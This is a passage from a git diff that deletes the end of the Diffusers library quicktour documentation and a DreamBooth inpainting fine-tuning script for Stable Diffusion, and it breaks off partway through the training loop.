[`~DiffusionPipeline.from_pretrained`] method: - -```python ->>> from diffusers import DiffusionPipeline - ->>> pipeline = DiffusionPipeline.from_pretrained("runwayml/stable-diffusion-v1-5", use_safetensors=True) -``` - -The [`DiffusionPipeline`] downloads and caches all modeling, tokenization, and scheduling components. You'll see that the Stable Diffusion pipeline is composed of the [`UNet2DConditionModel`] and [`PNDMScheduler`] among other things: - -```py ->>> pipeline -StableDiffusionPipeline { - "_class_name": "StableDiffusionPipeline", - "_diffusers_version": "0.13.1", - ..., - "scheduler": [ - "diffusers", - "PNDMScheduler" - ], - ..., - "unet": [ - "diffusers", - "UNet2DConditionModel" - ], - "vae": [ - "diffusers", - "AutoencoderKL" - ] -} -``` - -We strongly recommend running the pipeline on a GPU because the model consists of roughly 1.4 billion parameters. -You can move the generator object to a GPU, just like you would in PyTorch: - -```python ->>> pipeline.to("cuda") -``` - -Now you can pass a text prompt to the `pipeline` to generate an image, and then access the denoised image. By default, the image output is wrapped in a [`PIL.Image`](https://pillow.readthedocs.io/en/stable/reference/Image.html?highlight=image#the-image-class) object. - -```python ->>> image = pipeline("An image of a squirrel in Picasso style").images[0] ->>> image -``` - -
      - -
      - -Save the image by calling `save`: - -```python ->>> image.save("image_of_squirrel_painting.png") -``` - -### Local pipeline - -You can also use the pipeline locally. The only difference is you need to download the weights first: - -```bash -!git lfs install -!git clone https://huggingface.co/runwayml/stable-diffusion-v1-5 -``` - -Then load the saved weights into the pipeline: - -```python ->>> pipeline = DiffusionPipeline.from_pretrained("./stable-diffusion-v1-5", use_safetensors=True) -``` - -Now you can run the pipeline as you would in the section above. - -### Swapping schedulers - -Different schedulers come with different denoising speeds and quality trade-offs. The best way to find out which one works best for you is to try them out! One of the main features of 🧨 Diffusers is to allow you to easily switch between schedulers. For example, to replace the default [`PNDMScheduler`] with the [`EulerDiscreteScheduler`], load it with the [`~diffusers.ConfigMixin.from_config`] method: - -```py ->>> from diffusers import EulerDiscreteScheduler - ->>> pipeline = DiffusionPipeline.from_pretrained("runwayml/stable-diffusion-v1-5", use_safetensors=True) ->>> pipeline.scheduler = EulerDiscreteScheduler.from_config(pipeline.scheduler.config) -``` - -Try generating an image with the new scheduler and see if you notice a difference! - -In the next section, you'll take a closer look at the components - the model and scheduler - that make up the [`DiffusionPipeline`] and learn how to use these components to generate an image of a cat. - -## Models - -Most models take a noisy sample, and at each timestep it predicts the *noise residual* (other models learn to predict the previous sample directly or the velocity or [`v-prediction`](https://github.com/huggingface/diffusers/blob/5e5ce13e2f89ac45a0066cb3f369462a3cf1d9ef/src/diffusers/schedulers/scheduling_ddim.py#L110)), the difference between a less noisy image and the input image. You can mix and match models to create other diffusion systems. - -Models are initiated with the [`~ModelMixin.from_pretrained`] method which also locally caches the model weights so it is faster the next time you load the model. For the quicktour, you'll load the [`UNet2DModel`], a basic unconditional image generation model with a checkpoint trained on cat images: - -```py ->>> from diffusers import UNet2DModel - ->>> repo_id = "google/ddpm-cat-256" ->>> model = UNet2DModel.from_pretrained(repo_id, use_safetensors=True) -``` - -To access the model parameters, call `model.config`: - -```py ->>> model.config -``` - -The model configuration is a 🧊 frozen 🧊 dictionary, which means those parameters can't be changed after the model is created. This is intentional and ensures that the parameters used to define the model architecture at the start remain the same, while other parameters can still be adjusted during inference. - -Some of the most important parameters are: - -* `sample_size`: the height and width dimension of the input sample. -* `in_channels`: the number of input channels of the input sample. -* `down_block_types` and `up_block_types`: the type of down- and upsampling blocks used to create the UNet architecture. -* `block_out_channels`: the number of output channels of the downsampling blocks; also used in reverse order for the number of input channels of the upsampling blocks. -* `layers_per_block`: the number of ResNet blocks present in each UNet block. - -To use the model for inference, create the image shape with random Gaussian noise. It should have a `batch` axis because the model can receive multiple random noises, a `channel` axis corresponding to the number of input channels, and a `sample_size` axis for the height and width of the image: - -```py ->>> import torch - ->>> torch.manual_seed(0) - ->>> noisy_sample = torch.randn(1, model.config.in_channels, model.config.sample_size, model.config.sample_size) ->>> noisy_sample.shape -torch.Size([1, 3, 256, 256]) -``` - -For inference, pass the noisy image to the model and a `timestep`. The `timestep` indicates how noisy the input image is, with more noise at the beginning and less at the end. This helps the model determine its position in the diffusion process, whether it is closer to the start or the end. Use the `sample` method to get the model output: - -```py ->>> with torch.no_grad(): -... noisy_residual = model(sample=noisy_sample, timestep=2).sample -``` - -To generate actual examples though, you'll need a scheduler to guide the denoising process. In the next section, you'll learn how to couple a model with a scheduler. - -## Schedulers - -Schedulers manage going from a noisy sample to a less noisy sample given the model output - in this case, it is the `noisy_residual`. - - - -🧨 Diffusers is a toolbox for building diffusion systems. While the [`DiffusionPipeline`] is a convenient way to get started with a pre-built diffusion system, you can also choose your own model and scheduler components separately to build a custom diffusion system. - - - -For the quicktour, you'll instantiate the [`DDPMScheduler`] with it's [`~diffusers.ConfigMixin.from_config`] method: - -```py ->>> from diffusers import DDPMScheduler - ->>> scheduler = DDPMScheduler.from_config(repo_id) ->>> scheduler -DDPMScheduler { - "_class_name": "DDPMScheduler", - "_diffusers_version": "0.13.1", - "beta_end": 0.02, - "beta_schedule": "linear", - "beta_start": 0.0001, - "clip_sample": true, - "clip_sample_range": 1.0, - "num_train_timesteps": 1000, - "prediction_type": "epsilon", - "trained_betas": null, - "variance_type": "fixed_small" -} -``` - - - -💡 Notice how the scheduler is instantiated from a configuration. Unlike a model, a scheduler does not have trainable weights and is parameter-free! - - - -Some of the most important parameters are: - -* `num_train_timesteps`: the length of the denoising process or in other words, the number of timesteps required to process random Gaussian noise into a data sample. -* `beta_schedule`: the type of noise schedule to use for inference and training. -* `beta_start` and `beta_end`: the start and end noise values for the noise schedule. - -To predict a slightly less noisy image, pass the following to the scheduler's [`~diffusers.DDPMScheduler.step`] method: model output, `timestep`, and current `sample`. - -```py ->>> less_noisy_sample = scheduler.step(model_output=noisy_residual, timestep=2, sample=noisy_sample).prev_sample ->>> less_noisy_sample.shape -``` - -The `less_noisy_sample` can be passed to the next `timestep` where it'll get even less noisier! Let's bring it all together now and visualize the entire denoising process. - -First, create a function that postprocesses and displays the denoised image as a `PIL.Image`: - -```py ->>> import PIL.Image ->>> import numpy as np - - ->>> def display_sample(sample, i): -... image_processed = sample.cpu().permute(0, 2, 3, 1) -... image_processed = (image_processed + 1.0) * 127.5 -... image_processed = image_processed.numpy().astype(np.uint8) - -... image_pil = PIL.Image.fromarray(image_processed[0]) -... display(f"Image at step {i}") -... display(image_pil) -``` - -To speed up the denoising process, move the input and model to a GPU: - -```py ->>> model.to("cuda") ->>> noisy_sample = noisy_sample.to("cuda") -``` - -Now create a denoising loop that predicts the residual of the less noisy sample, and computes the less noisy sample with the scheduler: - -```py ->>> import tqdm - ->>> sample = noisy_sample - ->>> for i, t in enumerate(tqdm.tqdm(scheduler.timesteps)): -... # 1. predict noise residual -... with torch.no_grad(): -... residual = model(sample, t).sample - -... # 2. compute less noisy image and set x_t -> x_t-1 -... sample = scheduler.step(residual, t, sample).prev_sample - -... # 3. optionally look at image -... if (i + 1) % 50 == 0: -... display_sample(sample, i + 1) -``` - -Sit back and watch as a cat is generated from nothing but noise! 😻 - -
      - -
      - -## Next steps - -Hopefully you generated some cool images with 🧨 Diffusers in this quicktour! For your next steps, you can: - -* Train or finetune a model to generate your own images in the [training](./tutorials/basic_training) tutorial. -* See example official and community [training or finetuning scripts](https://github.com/huggingface/diffusers/tree/main/examples#-diffusers-examples) for a variety of use cases. -* Learn more about loading, accessing, changing and comparing schedulers in the [Using different Schedulers](./using-diffusers/schedulers) guide. -* Explore prompt engineering, speed and memory optimizations, and tips and tricks for generating higher quality images with the [Stable Diffusion](./stable_diffusion) guide. -* Dive deeper into speeding up 🧨 Diffusers with guides on [optimized PyTorch on a GPU](./optimization/fp16), and inference guides for running [Stable Diffusion on Apple Silicon (M1/M2)](./optimization/mps) and [ONNX Runtime](./optimization/onnx). diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/research_projects/dreambooth_inpaint/train_dreambooth_inpaint.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/research_projects/dreambooth_inpaint/train_dreambooth_inpaint.py deleted file mode 100644 index a3eaba014cf6c6a41b46f169868af3edafb521c3..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/examples/research_projects/dreambooth_inpaint/train_dreambooth_inpaint.py +++ /dev/null @@ -1,812 +0,0 @@ -import argparse -import hashlib -import itertools -import math -import os -import random -from pathlib import Path - -import numpy as np -import torch -import torch.nn.functional as F -import torch.utils.checkpoint -from accelerate import Accelerator -from accelerate.logging import get_logger -from accelerate.utils import ProjectConfiguration, set_seed -from huggingface_hub import create_repo, upload_folder -from PIL import Image, ImageDraw -from torch.utils.data import Dataset -from torchvision import transforms -from tqdm.auto import tqdm -from transformers import CLIPTextModel, CLIPTokenizer - -from diffusers import ( - AutoencoderKL, - DDPMScheduler, - StableDiffusionInpaintPipeline, - StableDiffusionPipeline, - UNet2DConditionModel, -) -from diffusers.optimization import get_scheduler -from diffusers.utils import check_min_version - - -# Will error if the minimal version of diffusers is not installed. Remove at your own risks. -check_min_version("0.13.0.dev0") - -logger = get_logger(__name__) - - -def prepare_mask_and_masked_image(image, mask): - image = np.array(image.convert("RGB")) - image = image[None].transpose(0, 3, 1, 2) - image = torch.from_numpy(image).to(dtype=torch.float32) / 127.5 - 1.0 - - mask = np.array(mask.convert("L")) - mask = mask.astype(np.float32) / 255.0 - mask = mask[None, None] - mask[mask < 0.5] = 0 - mask[mask >= 0.5] = 1 - mask = torch.from_numpy(mask) - - masked_image = image * (mask < 0.5) - - return mask, masked_image - - -# generate random masks -def random_mask(im_shape, ratio=1, mask_full_image=False): - mask = Image.new("L", im_shape, 0) - draw = ImageDraw.Draw(mask) - size = (random.randint(0, int(im_shape[0] * ratio)), random.randint(0, int(im_shape[1] * ratio))) - # use this to always mask the whole image - if mask_full_image: - size = (int(im_shape[0] * ratio), int(im_shape[1] * ratio)) - limits = (im_shape[0] - size[0] // 2, im_shape[1] - size[1] // 2) - center = (random.randint(size[0] // 2, limits[0]), random.randint(size[1] // 2, limits[1])) - draw_type = random.randint(0, 1) - if draw_type == 0 or mask_full_image: - draw.rectangle( - (center[0] - size[0] // 2, center[1] - size[1] // 2, center[0] + size[0] // 2, center[1] + size[1] // 2), - fill=255, - ) - else: - draw.ellipse( - (center[0] - size[0] // 2, center[1] - size[1] // 2, center[0] + size[0] // 2, center[1] + size[1] // 2), - fill=255, - ) - - return mask - - -def parse_args(): - parser = argparse.ArgumentParser(description="Simple example of a training script.") - parser.add_argument( - "--pretrained_model_name_or_path", - type=str, - default=None, - required=True, - help="Path to pretrained model or model identifier from huggingface.co/models.", - ) - parser.add_argument( - "--tokenizer_name", - type=str, - default=None, - help="Pretrained tokenizer name or path if not the same as model_name", - ) - parser.add_argument( - "--instance_data_dir", - type=str, - default=None, - required=True, - help="A folder containing the training data of instance images.", - ) - parser.add_argument( - "--class_data_dir", - type=str, - default=None, - required=False, - help="A folder containing the training data of class images.", - ) - parser.add_argument( - "--instance_prompt", - type=str, - default=None, - help="The prompt with identifier specifying the instance", - ) - parser.add_argument( - "--class_prompt", - type=str, - default=None, - help="The prompt to specify images in the same class as provided instance images.", - ) - parser.add_argument( - "--with_prior_preservation", - default=False, - action="store_true", - help="Flag to add prior preservation loss.", - ) - parser.add_argument("--prior_loss_weight", type=float, default=1.0, help="The weight of prior preservation loss.") - parser.add_argument( - "--num_class_images", - type=int, - default=100, - help=( - "Minimal class images for prior preservation loss. If not have enough images, additional images will be" - " sampled with class_prompt." - ), - ) - parser.add_argument( - "--output_dir", - type=str, - default="text-inversion-model", - help="The output directory where the model predictions and checkpoints will be written.", - ) - parser.add_argument("--seed", type=int, default=None, help="A seed for reproducible training.") - parser.add_argument( - "--resolution", - type=int, - default=512, - help=( - "The resolution for input images, all the images in the train/validation dataset will be resized to this" - " resolution" - ), - ) - parser.add_argument( - "--center_crop", - default=False, - action="store_true", - help=( - "Whether to center crop the input images to the resolution. If not set, the images will be randomly" - " cropped. The images will be resized to the resolution first before cropping." - ), - ) - parser.add_argument("--train_text_encoder", action="store_true", help="Whether to train the text encoder") - parser.add_argument( - "--train_batch_size", type=int, default=4, help="Batch size (per device) for the training dataloader." - ) - parser.add_argument( - "--sample_batch_size", type=int, default=4, help="Batch size (per device) for sampling images." - ) - parser.add_argument("--num_train_epochs", type=int, default=1) - parser.add_argument( - "--max_train_steps", - type=int, - default=None, - help="Total number of training steps to perform. If provided, overrides num_train_epochs.", - ) - parser.add_argument( - "--gradient_accumulation_steps", - type=int, - default=1, - help="Number of updates steps to accumulate before performing a backward/update pass.", - ) - parser.add_argument( - "--gradient_checkpointing", - action="store_true", - help="Whether or not to use gradient checkpointing to save memory at the expense of slower backward pass.", - ) - parser.add_argument( - "--learning_rate", - type=float, - default=5e-6, - help="Initial learning rate (after the potential warmup period) to use.", - ) - parser.add_argument( - "--scale_lr", - action="store_true", - default=False, - help="Scale the learning rate by the number of GPUs, gradient accumulation steps, and batch size.", - ) - parser.add_argument( - "--lr_scheduler", - type=str, - default="constant", - help=( - 'The scheduler type to use. Choose between ["linear", "cosine", "cosine_with_restarts", "polynomial",' - ' "constant", "constant_with_warmup"]' - ), - ) - parser.add_argument( - "--lr_warmup_steps", type=int, default=500, help="Number of steps for the warmup in the lr scheduler." - ) - parser.add_argument( - "--use_8bit_adam", action="store_true", help="Whether or not to use 8-bit Adam from bitsandbytes." - ) - parser.add_argument("--adam_beta1", type=float, default=0.9, help="The beta1 parameter for the Adam optimizer.") - parser.add_argument("--adam_beta2", type=float, default=0.999, help="The beta2 parameter for the Adam optimizer.") - parser.add_argument("--adam_weight_decay", type=float, default=1e-2, help="Weight decay to use.") - parser.add_argument("--adam_epsilon", type=float, default=1e-08, help="Epsilon value for the Adam optimizer") - parser.add_argument("--max_grad_norm", default=1.0, type=float, help="Max gradient norm.") - parser.add_argument("--push_to_hub", action="store_true", help="Whether or not to push the model to the Hub.") - parser.add_argument("--hub_token", type=str, default=None, help="The token to use to push to the Model Hub.") - parser.add_argument( - "--hub_model_id", - type=str, - default=None, - help="The name of the repository to keep in sync with the local `output_dir`.", - ) - parser.add_argument( - "--logging_dir", - type=str, - default="logs", - help=( - "[TensorBoard](https://www.tensorflow.org/tensorboard) log directory. Will default to" - " *output_dir/runs/**CURRENT_DATETIME_HOSTNAME***." - ), - ) - parser.add_argument( - "--mixed_precision", - type=str, - default="no", - choices=["no", "fp16", "bf16"], - help=( - "Whether to use mixed precision. Choose" - "between fp16 and bf16 (bfloat16). Bf16 requires PyTorch >= 1.10." - "and an Nvidia Ampere GPU." - ), - ) - parser.add_argument("--local_rank", type=int, default=-1, help="For distributed training: local_rank") - parser.add_argument( - "--checkpointing_steps", - type=int, - default=500, - help=( - "Save a checkpoint of the training state every X updates. These checkpoints can be used both as final" - " checkpoints in case they are better than the last checkpoint and are suitable for resuming training" - " using `--resume_from_checkpoint`." - ), - ) - parser.add_argument( - "--checkpoints_total_limit", - type=int, - default=None, - help=( - "Max number of checkpoints to store. Passed as `total_limit` to the `Accelerator` `ProjectConfiguration`." - " See Accelerator::save_state https://huggingface.co/docs/accelerate/package_reference/accelerator#accelerate.Accelerator.save_state" - " for more docs" - ), - ) - parser.add_argument( - "--resume_from_checkpoint", - type=str, - default=None, - help=( - "Whether training should be resumed from a previous checkpoint. Use a path saved by" - ' `--checkpointing_steps`, or `"latest"` to automatically select the last available checkpoint.' - ), - ) - - args = parser.parse_args() - env_local_rank = int(os.environ.get("LOCAL_RANK", -1)) - if env_local_rank != -1 and env_local_rank != args.local_rank: - args.local_rank = env_local_rank - - if args.instance_data_dir is None: - raise ValueError("You must specify a train data directory.") - - if args.with_prior_preservation: - if args.class_data_dir is None: - raise ValueError("You must specify a data directory for class images.") - if args.class_prompt is None: - raise ValueError("You must specify prompt for class images.") - - return args - - -class DreamBoothDataset(Dataset): - """ - A dataset to prepare the instance and class images with the prompts for fine-tuning the model. - It pre-processes the images and the tokenizes prompts. - """ - - def __init__( - self, - instance_data_root, - instance_prompt, - tokenizer, - class_data_root=None, - class_prompt=None, - size=512, - center_crop=False, - ): - self.size = size - self.center_crop = center_crop - self.tokenizer = tokenizer - - self.instance_data_root = Path(instance_data_root) - if not self.instance_data_root.exists(): - raise ValueError("Instance images root doesn't exists.") - - self.instance_images_path = list(Path(instance_data_root).iterdir()) - self.num_instance_images = len(self.instance_images_path) - self.instance_prompt = instance_prompt - self._length = self.num_instance_images - - if class_data_root is not None: - self.class_data_root = Path(class_data_root) - self.class_data_root.mkdir(parents=True, exist_ok=True) - self.class_images_path = list(self.class_data_root.iterdir()) - self.num_class_images = len(self.class_images_path) - self._length = max(self.num_class_images, self.num_instance_images) - self.class_prompt = class_prompt - else: - self.class_data_root = None - - self.image_transforms_resize_and_crop = transforms.Compose( - [ - transforms.Resize(size, interpolation=transforms.InterpolationMode.BILINEAR), - transforms.CenterCrop(size) if center_crop else transforms.RandomCrop(size), - ] - ) - - self.image_transforms = transforms.Compose( - [ - transforms.ToTensor(), - transforms.Normalize([0.5], [0.5]), - ] - ) - - def __len__(self): - return self._length - - def __getitem__(self, index): - example = {} - instance_image = Image.open(self.instance_images_path[index % self.num_instance_images]) - if not instance_image.mode == "RGB": - instance_image = instance_image.convert("RGB") - instance_image = self.image_transforms_resize_and_crop(instance_image) - - example["PIL_images"] = instance_image - example["instance_images"] = self.image_transforms(instance_image) - - example["instance_prompt_ids"] = self.tokenizer( - self.instance_prompt, - padding="do_not_pad", - truncation=True, - max_length=self.tokenizer.model_max_length, - ).input_ids - - if self.class_data_root: - class_image = Image.open(self.class_images_path[index % self.num_class_images]) - if not class_image.mode == "RGB": - class_image = class_image.convert("RGB") - class_image = self.image_transforms_resize_and_crop(class_image) - example["class_images"] = self.image_transforms(class_image) - example["class_PIL_images"] = class_image - example["class_prompt_ids"] = self.tokenizer( - self.class_prompt, - padding="do_not_pad", - truncation=True, - max_length=self.tokenizer.model_max_length, - ).input_ids - - return example - - -class PromptDataset(Dataset): - "A simple dataset to prepare the prompts to generate class images on multiple GPUs." - - def __init__(self, prompt, num_samples): - self.prompt = prompt - self.num_samples = num_samples - - def __len__(self): - return self.num_samples - - def __getitem__(self, index): - example = {} - example["prompt"] = self.prompt - example["index"] = index - return example - - -def main(): - args = parse_args() - logging_dir = Path(args.output_dir, args.logging_dir) - - project_config = ProjectConfiguration( - total_limit=args.checkpoints_total_limit, project_dir=args.output_dir, logging_dir=logging_dir - ) - - accelerator = Accelerator( - gradient_accumulation_steps=args.gradient_accumulation_steps, - mixed_precision=args.mixed_precision, - log_with="tensorboard", - project_config=project_config, - ) - - # Currently, it's not possible to do gradient accumulation when training two models with accelerate.accumulate - # This will be enabled soon in accelerate. For now, we don't allow gradient accumulation when training two models. - # TODO (patil-suraj): Remove this check when gradient accumulation with two models is enabled in accelerate. - if args.train_text_encoder and args.gradient_accumulation_steps > 1 and accelerator.num_processes > 1: - raise ValueError( - "Gradient accumulation is not supported when training the text encoder in distributed training. " - "Please set gradient_accumulation_steps to 1. This feature will be supported in the future." - ) - - if args.seed is not None: - set_seed(args.seed) - - if args.with_prior_preservation: - class_images_dir = Path(args.class_data_dir) - if not class_images_dir.exists(): - class_images_dir.mkdir(parents=True) - cur_class_images = len(list(class_images_dir.iterdir())) - - if cur_class_images < args.num_class_images: - torch_dtype = torch.float16 if accelerator.device.type == "cuda" else torch.float32 - pipeline = StableDiffusionInpaintPipeline.from_pretrained( - args.pretrained_model_name_or_path, torch_dtype=torch_dtype, safety_checker=None - ) - pipeline.set_progress_bar_config(disable=True) - - num_new_images = args.num_class_images - cur_class_images - logger.info(f"Number of class images to sample: {num_new_images}.") - - sample_dataset = PromptDataset(args.class_prompt, num_new_images) - sample_dataloader = torch.utils.data.DataLoader( - sample_dataset, batch_size=args.sample_batch_size, num_workers=1 - ) - - sample_dataloader = accelerator.prepare(sample_dataloader) - pipeline.to(accelerator.device) - transform_to_pil = transforms.ToPILImage() - for example in tqdm( - sample_dataloader, desc="Generating class images", disable=not accelerator.is_local_main_process - ): - bsz = len(example["prompt"]) - fake_images = torch.rand((3, args.resolution, args.resolution)) - transform_to_pil = transforms.ToPILImage() - fake_pil_images = transform_to_pil(fake_images) - - fake_mask = random_mask((args.resolution, args.resolution), ratio=1, mask_full_image=True) - - images = pipeline(prompt=example["prompt"], mask_image=fake_mask, image=fake_pil_images).images - - for i, image in enumerate(images): - hash_image = hashlib.sha1(image.tobytes()).hexdigest() - image_filename = class_images_dir / f"{example['index'][i] + cur_class_images}-{hash_image}.jpg" - image.save(image_filename) - - del pipeline - if torch.cuda.is_available(): - torch.cuda.empty_cache() - - # Handle the repository creation - if accelerator.is_main_process: - if args.output_dir is not None: - os.makedirs(args.output_dir, exist_ok=True) - - if args.push_to_hub: - repo_id = create_repo( - repo_id=args.hub_model_id or Path(args.output_dir).name, exist_ok=True, token=args.hub_token - ).repo_id - - # Load the tokenizer - if args.tokenizer_name: - tokenizer = CLIPTokenizer.from_pretrained(args.tokenizer_name) - elif args.pretrained_model_name_or_path: - tokenizer = CLIPTokenizer.from_pretrained(args.pretrained_model_name_or_path, subfolder="tokenizer") - - # Load models and create wrapper for stable diffusion - text_encoder = CLIPTextModel.from_pretrained(args.pretrained_model_name_or_path, subfolder="text_encoder") - vae = AutoencoderKL.from_pretrained(args.pretrained_model_name_or_path, subfolder="vae") - unet = UNet2DConditionModel.from_pretrained(args.pretrained_model_name_or_path, subfolder="unet") - - vae.requires_grad_(False) - if not args.train_text_encoder: - text_encoder.requires_grad_(False) - - if args.gradient_checkpointing: - unet.enable_gradient_checkpointing() - if args.train_text_encoder: - text_encoder.gradient_checkpointing_enable() - - if args.scale_lr: - args.learning_rate = ( - args.learning_rate * args.gradient_accumulation_steps * args.train_batch_size * accelerator.num_processes - ) - - # Use 8-bit Adam for lower memory usage or to fine-tune the model in 16GB GPUs - if args.use_8bit_adam: - try: - import bitsandbytes as bnb - except ImportError: - raise ImportError( - "To use 8-bit Adam, please install the bitsandbytes library: `pip install bitsandbytes`." - ) - - optimizer_class = bnb.optim.AdamW8bit - else: - optimizer_class = torch.optim.AdamW - - params_to_optimize = ( - itertools.chain(unet.parameters(), text_encoder.parameters()) if args.train_text_encoder else unet.parameters() - ) - optimizer = optimizer_class( - params_to_optimize, - lr=args.learning_rate, - betas=(args.adam_beta1, args.adam_beta2), - weight_decay=args.adam_weight_decay, - eps=args.adam_epsilon, - ) - - noise_scheduler = DDPMScheduler.from_pretrained(args.pretrained_model_name_or_path, subfolder="scheduler") - - train_dataset = DreamBoothDataset( - instance_data_root=args.instance_data_dir, - instance_prompt=args.instance_prompt, - class_data_root=args.class_data_dir if args.with_prior_preservation else None, - class_prompt=args.class_prompt, - tokenizer=tokenizer, - size=args.resolution, - center_crop=args.center_crop, - ) - - def collate_fn(examples): - input_ids = [example["instance_prompt_ids"] for example in examples] - pixel_values = [example["instance_images"] for example in examples] - - # Concat class and instance examples for prior preservation. - # We do this to avoid doing two forward passes. - if args.with_prior_preservation: - input_ids += [example["class_prompt_ids"] for example in examples] - pixel_values += [example["class_images"] for example in examples] - pior_pil = [example["class_PIL_images"] for example in examples] - - masks = [] - masked_images = [] - for example in examples: - pil_image = example["PIL_images"] - # generate a random mask - mask = random_mask(pil_image.size, 1, False) - # prepare mask and masked image - mask, masked_image = prepare_mask_and_masked_image(pil_image, mask) - - masks.append(mask) - masked_images.append(masked_image) - - if args.with_prior_preservation: - for pil_image in pior_pil: - # generate a random mask - mask = random_mask(pil_image.size, 1, False) - # prepare mask and masked image - mask, masked_image = prepare_mask_and_masked_image(pil_image, mask) - - masks.append(mask) - masked_images.append(masked_image) - - pixel_values = torch.stack(pixel_values) - pixel_values = pixel_values.to(memory_format=torch.contiguous_format).float() - - input_ids = tokenizer.pad({"input_ids": input_ids}, padding=True, return_tensors="pt").input_ids - masks = torch.stack(masks) - masked_images = torch.stack(masked_images) - batch = {"input_ids": input_ids, "pixel_values": pixel_values, "masks": masks, "masked_images": masked_images} - return batch - - train_dataloader = torch.utils.data.DataLoader( - train_dataset, batch_size=args.train_batch_size, shuffle=True, collate_fn=collate_fn - ) - - # Scheduler and math around the number of training steps. - overrode_max_train_steps = False - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if args.max_train_steps is None: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - overrode_max_train_steps = True - - lr_scheduler = get_scheduler( - args.lr_scheduler, - optimizer=optimizer, - num_warmup_steps=args.lr_warmup_steps * accelerator.num_processes, - num_training_steps=args.max_train_steps * accelerator.num_processes, - ) - - if args.train_text_encoder: - unet, text_encoder, optimizer, train_dataloader, lr_scheduler = accelerator.prepare( - unet, text_encoder, optimizer, train_dataloader, lr_scheduler - ) - else: - unet, optimizer, train_dataloader, lr_scheduler = accelerator.prepare( - unet, optimizer, train_dataloader, lr_scheduler - ) - accelerator.register_for_checkpointing(lr_scheduler) - - weight_dtype = torch.float32 - if args.mixed_precision == "fp16": - weight_dtype = torch.float16 - elif args.mixed_precision == "bf16": - weight_dtype = torch.bfloat16 - - # Move text_encode and vae to gpu. - # For mixed precision training we cast the text_encoder and vae weights to half-precision - # as these models are only used for inference, keeping weights in full precision is not required. - vae.to(accelerator.device, dtype=weight_dtype) - if not args.train_text_encoder: - text_encoder.to(accelerator.device, dtype=weight_dtype) - - # We need to recalculate our total training steps as the size of the training dataloader may have changed. - num_update_steps_per_epoch = math.ceil(len(train_dataloader) / args.gradient_accumulation_steps) - if overrode_max_train_steps: - args.max_train_steps = args.num_train_epochs * num_update_steps_per_epoch - # Afterwards we recalculate our number of training epochs - args.num_train_epochs = math.ceil(args.max_train_steps / num_update_steps_per_epoch) - - # We need to initialize the trackers we use, and also store our configuration. - # The trackers initializes automatically on the main process. - if accelerator.is_main_process: - accelerator.init_trackers("dreambooth", config=vars(args)) - - # Train! - total_batch_size = args.train_batch_size * accelerator.num_processes * args.gradient_accumulation_steps - - logger.info("***** Running training *****") - logger.info(f" Num examples = {len(train_dataset)}") - logger.info(f" Num batches each epoch = {len(train_dataloader)}") - logger.info(f" Num Epochs = {args.num_train_epochs}") - logger.info(f" Instantaneous batch size per device = {args.train_batch_size}") - logger.info(f" Total train batch size (w. parallel, distributed & accumulation) = {total_batch_size}") - logger.info(f" Gradient Accumulation steps = {args.gradient_accumulation_steps}") - logger.info(f" Total optimization steps = {args.max_train_steps}") - global_step = 0 - first_epoch = 0 - - if args.resume_from_checkpoint: - if args.resume_from_checkpoint != "latest": - path = os.path.basename(args.resume_from_checkpoint) - else: - # Get the most recent checkpoint - dirs = os.listdir(args.output_dir) - dirs = [d for d in dirs if d.startswith("checkpoint")] - dirs = sorted(dirs, key=lambda x: int(x.split("-")[1])) - path = dirs[-1] if len(dirs) > 0 else None - - if path is None: - accelerator.print( - f"Checkpoint '{args.resume_from_checkpoint}' does not exist. Starting a new training run." - ) - args.resume_from_checkpoint = None - else: - accelerator.print(f"Resuming from checkpoint {path}") - accelerator.load_state(os.path.join(args.output_dir, path)) - global_step = int(path.split("-")[1]) - - resume_global_step = global_step * args.gradient_accumulation_steps - first_epoch = global_step // num_update_steps_per_epoch - resume_step = resume_global_step % (num_update_steps_per_epoch * args.gradient_accumulation_steps) - - # Only show the progress bar once on each machine. - progress_bar = tqdm(range(global_step, args.max_train_steps), disable=not accelerator.is_local_main_process) - progress_bar.set_description("Steps") - - for epoch in range(first_epoch, args.num_train_epochs): - unet.train() - for step, batch in enumerate(train_dataloader): - # Skip steps until we reach the resumed step - if args.resume_from_checkpoint and epoch == first_epoch and step < resume_step: - if step % args.gradient_accumulation_steps == 0: - progress_bar.update(1) - continue - - with accelerator.accumulate(unet): - # Convert images to latent space - - latents = vae.encode(batch["pixel_values"].to(dtype=weight_dtype)).latent_dist.sample() - latents = latents * vae.config.scaling_factor - - # Convert masked images to latent space - masked_latents = vae.encode( - batch["masked_images"].reshape(batch["pixel_values"].shape).to(dtype=weight_dtype) - ).latent_dist.sample() - masked_latents = masked_latents * vae.config.scaling_factor - - masks = batch["masks"] - # resize the mask to latents shape as we concatenate the mask to the latents - mask = torch.stack( - [ - torch.nn.functional.interpolate(mask, size=(args.resolution // 8, args.resolution // 8)) - for mask in masks - ] - ) - mask = mask.reshape(-1, 1, args.resolution // 8, args.resolution // 8) - - # Sample noise that we'll add to the latents - noise = torch.randn_like(latents) - bsz = latents.shape[0] - # Sample a random timestep for each image - timesteps = torch.randint(0, noise_scheduler.config.num_train_timesteps, (bsz,), device=latents.device) - timesteps = timesteps.long() - - # Add noise to the latents according to the noise magnitude at each timestep - # (this is the forward diffusion process) - noisy_latents = noise_scheduler.add_noise(latents, noise, timesteps) - - # concatenate the noised latents with the mask and the masked latents - latent_model_input = torch.cat([noisy_latents, mask, masked_latents], dim=1) - - # Get the text embedding for conditioning - encoder_hidden_states = text_encoder(batch["input_ids"])[0] - - # Predict the noise residual - noise_pred = unet(latent_model_input, timesteps, encoder_hidden_states).sample - - # Get the target for loss depending on the prediction type - if noise_scheduler.config.prediction_type == "epsilon": - target = noise - elif noise_scheduler.config.prediction_type == "v_prediction": - target = noise_scheduler.get_velocity(latents, noise, timesteps) - else: - raise ValueError(f"Unknown prediction type {noise_scheduler.config.prediction_type}") - - if args.with_prior_preservation: - # Chunk the noise and noise_pred into two parts and compute the loss on each part separately. - noise_pred, noise_pred_prior = torch.chunk(noise_pred, 2, dim=0) - target, target_prior = torch.chunk(target, 2, dim=0) - - # Compute instance loss - loss = F.mse_loss(noise_pred.float(), target.float(), reduction="none").mean([1, 2, 3]).mean() - - # Compute prior loss - prior_loss = F.mse_loss(noise_pred_prior.float(), target_prior.float(), reduction="mean") - 